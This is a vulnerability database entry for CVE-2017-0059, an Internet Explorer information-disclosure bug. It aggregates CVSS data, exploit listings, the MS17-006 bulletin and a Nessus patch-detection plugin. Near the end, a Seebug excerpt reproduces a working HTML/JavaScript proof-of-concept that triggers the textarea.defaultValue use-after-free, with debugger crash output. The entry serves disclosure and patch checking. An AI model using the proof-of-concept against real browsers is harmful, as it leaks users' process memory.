Vulnerabilities > CVE-2017-0059 - Information Exposure vulnerability in Microsoft Internet Explorer 10/11/9

047910
CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
microsoft
CWE-200
nessus
exploit available
NVD
Published: 2017-03-17
Updated: 2017-11-19

Summary

Microsoft Internet Explorer 9 through 11 allow remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability." This vulnerability is different from those described in CVE-2017-0008 and CVE-2017-0009.

Vulnerable Configurations

Part Description Count
Application
Microsoft
3

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Subverting Environment Variable Values
    The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
  • Footprinting
    An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
  • Exploiting Trust in Client (aka Make the Client Invisible)
    An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
  • Browser Fingerprinting
    An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
  • Session Credential Falsification through Prediction
    This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

Exploit-Db

  • fileexploits/windows_x86/remote/43125.html
    idEDB-ID:43125
    last seen2018-11-30
    modified2017-10-17
    platformwindows_x86
    port
    published2017-10-17
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/43125
    titleMicrosoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
    typeremote
  • descriptionMicrosoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006). CVE-2017-0059. Dos exploit for Windows platform. Tags: Denial of Service ...
    fileexploits/windows/dos/41661.html
    idEDB-ID:41661
    last seen2017-03-20
    modified2017-03-20
    platformwindows
    port
    published2017-03-20
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/41661/
    titleMicrosoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)
    typedos
  • idEDB-ID:42354

Msbulletin

bulletin_idMS17-006
bulletin_url
date2017-03-14T00:00:00
impactRemote Code Execution
knowledgebase_id4013073
knowledgebase_url
severityCritical
titleCumulative Security Update for Internet Explorer

Nessus

NASL familyWindows : Microsoft Bulletins
NASL idSMB_NT_MS17-006.NASL
descriptionThe version of Internet Explorer installed on the remote Windows host is missing Cumulative Security Update 4013073. It is, therefore, affected by multiple vulnerabilities, the most severe of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user.
last seen2020-06-01
modified2020-06-02
plugin id97729
published2017-03-14
reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/97729
titleMS17-006: Cumulative Security Update for Internet Explorer (4013073)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(97729);
  script_version("1.14");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id(
    "CVE-2017-0008",
    "CVE-2017-0009",
    "CVE-2017-0012",
    "CVE-2017-0018",
    "CVE-2017-0033",
    "CVE-2017-0037",
    "CVE-2017-0040",
    "CVE-2017-0049",
    "CVE-2017-0059",
    "CVE-2017-0130",
    "CVE-2017-0149",
    "CVE-2017-0154"
  );
  script_bugtraq_id(
    96073,
    96077,
    96085,
    96086,
    96087,
    96088,
    96094,
    96095,
    96645,
    96647,
    96724,
    96766
  );
  script_xref(name:"MSFT", value:"MS17-006");
  script_xref(name:"MSKB", value:"3218362");
  script_xref(name:"MSKB", value:"4012204");
  script_xref(name:"MSKB", value:"4012215");
  script_xref(name:"MSKB", value:"4012216");
  script_xref(name:"MSKB", value:"4012217");
  script_xref(name:"MSKB", value:"4012606");
  script_xref(name:"MSKB", value:"4013198");
  script_xref(name:"MSKB", value:"4013429");

  script_name(english:"MS17-006: Cumulative Security Update for Internet Explorer (4013073)");
  script_summary(english:"Checks the version of mshtml.dll or the installed rollup.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host has a web browser installed that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"The version of Internet Explorer installed on the remote Windows host
is missing Cumulative Security Update 4013073. It is, therefore,
affected by multiple vulnerabilities, the most severe of which are
remote code execution vulnerabilities. An unauthenticated, remote
attacker can exploit these vulnerabilities by convincing a user to
visit a specially crafted website, resulting in the execution of
arbitrary code in the context of the current user.");
  script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-006");
  script_set_attribute(attribute:"solution", value:
"Microsoft has released a set of patches for Internet Explorer 9, 10,
and 11.

Note that security update 3218362 in MS17-006 must also be installed
in order to fully resolve CVE-2017-0008 on Windows Vista and Windows
Server 2008.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-0149");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/02/23");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/03/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/14");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:ie");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows : Microsoft Bulletins");

  script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl", "smb_check_rollup.nasl");
  script_require_keys("SMB/MS_Bulletin_Checks/Possible");
  script_require_ports(139, 445, "Host/patch_management_checks");

  exit(0);
}

include("audit.inc");
include("smb_hotfixes_fcheck.inc");
include("smb_hotfixes.inc");
include("smb_func.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS17-006';
kbs = make_list(
  '4012204', # ie9 ; vista and 2008
  '3218362', # ie9 ; api messaging ; vista and 2008
  '4012204', # ie10 sec rollup ; 2012
  '4012217', # ie10 reg rollup ; 2012
  '4012204', # ie11 sec rollup ; 7 and 2008 r2
  '4012215', # ie11 reg rollup ; 7 and 2008 r2
  '4012204', # ie11 sec rollup ; 8.1 and 2012 r2
  '4012216', # ie11 reg rollup ; 8.1 and 2012 r2
  '4012606', # ie11 rollup ; win 10
  '4013198', # ie11 rollup ; win 10 1511
  '4013429'  # ie11 rollup ; win 10 1607
);

if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

if (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0',  win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);

productname = get_kb_item_or_exit("SMB/ProductName", exit_code:1);
if ("Windows 8" >< productname && "8.1" >!< productname)
 audit(AUDIT_OS_SP_NOT_VULN);

if (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);

share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

if (
  # Windows 10 1607
  smb_check_rollup(os:"10", sp:0, os_build:"14393", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4013429)) ||
  # Windows 10 1511
  smb_check_rollup(os:"10", sp:0, os_build:"10586", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||
  # Windows 10
  smb_check_rollup(os:"10", sp:0, os_build:"10240", rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||

  # Windows 8.1 / Windows Server 2012 R2
  # Internet Explorer 11
  ( smb_check_rollup(os:"6.3", sp:0, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012216)) &&
    hotfix_is_vulnerable(os:"6.3", sp:0, file:"mshtml.dll", version:"11.0.9600.18618", min_version:"11.0.9600.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Windows Server 2012
  # Internet Explorer 10
  ( smb_check_rollup(os:"6.2", sp:0, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012217)) &&
    hotfix_is_vulnerable(os:"6.2", sp:0, file:"mshtml.dll", version:"10.0.9200.22104", min_version:"10.0.9200.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Windows 7 / Server 2008 R2
  # Internet Explorer 11
  ( smb_check_rollup(os:"6.1", sp:1, rollup_date: "03_2017", bulletin:bulletin, rollup_kb_list:make_list(4012215)) &&
    hotfix_is_vulnerable(os:"6.1", sp:1, file:"mshtml.dll", version:"11.0.9600.18618", min_version:"11.0.9600.16000", dir:"\system32", bulletin:bulletin, kb:"4012204")) ||

  # Vista / Windows Server 2008
  # Internet Explorer 9
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"mshtml.dll", version:"9.0.8112.20985", min_version:"9.0.8112.20000", dir:"\system32", bulletin:bulletin, kb:"4012204") ||
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"mshtml.dll", version:"9.0.8112.16871", min_version:"9.0.8112.16000", dir:"\system32", bulletin:bulletin, kb:"4012204") ||

  # KB 3218362 / Vista and Windows Server 2008 / Inetcomm.dll
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"inetcomm.dll", version:"6.0.6002.24052", min_version:"6.0.6002.23000", dir:"\system32", bulletin:bulletin, kb:"3218362") ||
  hotfix_is_vulnerable(os:"6.0", sp:2, file:"inetcomm.dll", version:"6.0.6002.19728", min_version:"6.0.6002.18000", dir:"\system32", bulletin:bulletin, kb:"3218362")
)
{
  set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
  hotfix_security_hole();
  hotfix_check_fversion_end();
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
}

Seebug

bulletinFamilyexploit
descriptionThere is an use-after-free bug in IE which can lead to info leak / memory disclosure. The bug was confirmed on Internet Explorer version 11.0.9600.18537 (update version 11.0.38) PoC: ``` <!-- saved from url=(0014)about:internet --> <script> function run() { var textarea = document.getElementById("textarea"); var frame = document.createElement("iframe"); textarea.appendChild(frame); frame.contentDocument.onreadystatechange = eventhandler; form.reset(); } function eventhandler() { document.getElementById("textarea").defaultValue = "foo"; alert("Text value freed, can be reallocated here"); } </script> <body onload=run()> <form id="form"> <textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea> ``` Please also see the attached screenshots that demonstrate using the PoC for memory disclosure. The root cause of a bug is actually a use-after-free on the textarea text value, which can be seen if a PoC is run with Page Heap enabled. In that case IE crashes at (b5c.f44): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ``` eax=10abbff8 ebx=00000002 ecx=10abbff8 edx=10abbff8 esi=0e024ffc edi=00000000 eip=7582c006 esp=0a3aac48 ebp=0a3aac54 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 msvcrt!wcscpy_s+0x46: 7582c006 0fb706 movzx eax,word ptr [esi] ds:002b:0e024ffc=???? 0:008> k # ChildEBP RetAddr 00 0a3aac54 7198e8f0 msvcrt!wcscpy_s+0x46 01 0a3aad48 7189508e MSHTML!CElement::InjectInternal+0x6fa 02 0a3aad88 7189500c MSHTML!CRichtext::SetValueHelperInternal+0x79 03 0a3aada0 71894cf9 MSHTML!CRichtext::DoReset+0x3f 04 0a3aae24 71894b73 MSHTML!CFormElement::DoReset+0x157 05 0a3aae40 706c05da MSHTML!CFastDOM::CHTMLFormElement::Trampoline_reset+0x33 06 0a3aaeb0 706b6d73 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x19d 07 0a3aaef8 706baa24 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 08 0a3ab19c 7071451a jscript9!Js::InterpreterStackFrame::Process+0x3a10 09 0a3ab1d4 70714579 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49 0a 0a3ab478 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x49a8 0b 0a3ab5b4 09780fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 WARNING: Frame IP not in any known module. Following frames may be wrong. 0c 0a3ab5c0 706bda16 0x9780fd9 0d 0a3ab868 706bdbe9 jscript9!Js::InterpreterStackFrame::Process+0x1e62 0e 0a3ab984 09780fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 0f 0a3ab990 706b6d73 0x9780fe1 10 0a3ab9dc 706b73a8 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 11 0a3aba50 706b72dd jscript9!Js::JavascriptFunction::CallRootFunction+0xb5 12 0a3aba98 706b7270 jscript9!ScriptSite::CallRootFunction+0x42 13 0a3abae4 7086d8f8 jscript9!ScriptSite::Execute+0xd2 14 0a3abb48 7165a587 jscript9!ScriptEngineBase::Execute+0xc7 15 0a3abc04 7165a421 MSHTML!CListenerDispatch::InvokeVar+0x15a 16 0a3abc30 7165a11c MSHTML!CListenerDispatch::Invoke+0x6d 17 0a3abcd0 7165a286 MSHTML!CEventMgr::_InvokeListeners+0x210 18 0a3abce8 7165a1ad MSHTML!CEventMgr::_InvokeListenersOnWindow+0x42 19 0a3abd78 71659f1b MSHTML!CEventMgr::_InvokeListeners+0x150 1a 0a3abedc 714df1d7 MSHTML!CEventMgr::Dispatch+0x4d5 1b 0a3abf08 71969808 MSHTML!CEventMgr::DispatchEvent+0x90 1c 0a3abf40 7132de1f MSHTML!COmWindowProxy::Fire_onload+0x146 1d 0a3abfa0 7132df9c MSHTML!CMarkup::OnLoadStatusDone+0x5c0 1e 0a3abfbc 7132cd31 MSHTML!CMarkup::OnLoadStatus+0xed 1f 0a3ac400 714e8062 MSHTML!CProgSink::DoUpdate+0x48d 20 0a3ac40c 712de2f9 MSHTML!CProgSink::OnMethodCall+0x12 21 0a3ac45c 712ddcfa MSHTML!GlobalWndOnMethodCall+0x16c 22 0a3ac4b0 759962fa MSHTML!GlobalWndProc+0x103 23 0a3ac4dc 75996d3a user32!InternalCallWinProc+0x23 24 0a3ac554 759977c4 user32!UserCallWinProcCheckWow+0x109 25 0a3ac5b4 7599788a user32!DispatchMessageWorker+0x3b5 26 0a3ac5c4 726da99c user32!DispatchMessageW+0xf 27 0a3af794 7277ec38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 28 0a3af854 765182ec IEFRAME!LCIETab_ThreadProc+0x3e7 29 0a3af86c 73f73a31 iertutil!CMemBlockRegistrar::_LoadProcs+0x67 2a 0a3af8a4 75e0336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 2b 0a3af8b0 77b19902 kernel32!BaseThreadInitThunk+0xe 2c 0a3af8f0 77b198d5 ntdll!__RtlUserThreadStart+0x70 2d 0a3af908 00000000 ntdll!_RtlUserThreadStart+0x1b ``` where the old value was deleated at ``` 0:008> !heap -p -a 0e024ffc address 0e024ffc found in _DPH_HEAP_ROOT @ f1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) dd03820: e024000 2000 7417947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d 77bb126b ntdll!RtlDebugReAllocateHeap+0x00000033 77b6de86 ntdll!RtlReAllocateHeap+0x00000054 71ba761f MSHTML!CTravelLog::_AddEntryInternal+0x00000215 71b8f48d MSHTML!MemoryProtection::HeapReAlloc<0>+0x00000026 71b8f446 MSHTML!_HeapRealloc<0>+0x00000011 7162deea MSHTML!BASICPROPPARAMS::SetStringProperty+0x00000546 71678877 MSHTML!CBase::put_StringHelper+0x0000004d 71fc6d60 MSHTML!CFastDOM::CHTMLTextAreaElement::Trampoline_Set_defaultValue+0x00000070 706c05da jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000019d 706c0f77 jscript9!Js::JavascriptOperators::CallSetter+0x00000138 706c0eb4 jscript9!Js::JavascriptOperators::CallSetter+0x00000076 70710cd3 jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341 70710b26 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040 70710ba6 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d 706ba60e jscript9!Js::InterpreterStackFrame::Process+0x00002c1e 706bdbe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200 ``` Note: because the text allocations aren't protected by MemGC and happen on the process heap, use-after-free bugs dealing with text allocations are still exploitable. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. ![](https://images.seebug.org/1490080697476) ![](https://images.seebug.org/1490080704091)
idSSV:92806
last seen2017-11-19
modified2017-03-21
published2017-03-21
reporterfizz
sourcehttps://www.seebug.org/vuldb/ssvid-92806
titleMicrosoft IE: textarea.defaultValue memory disclosure (CVE-2017-0059)

References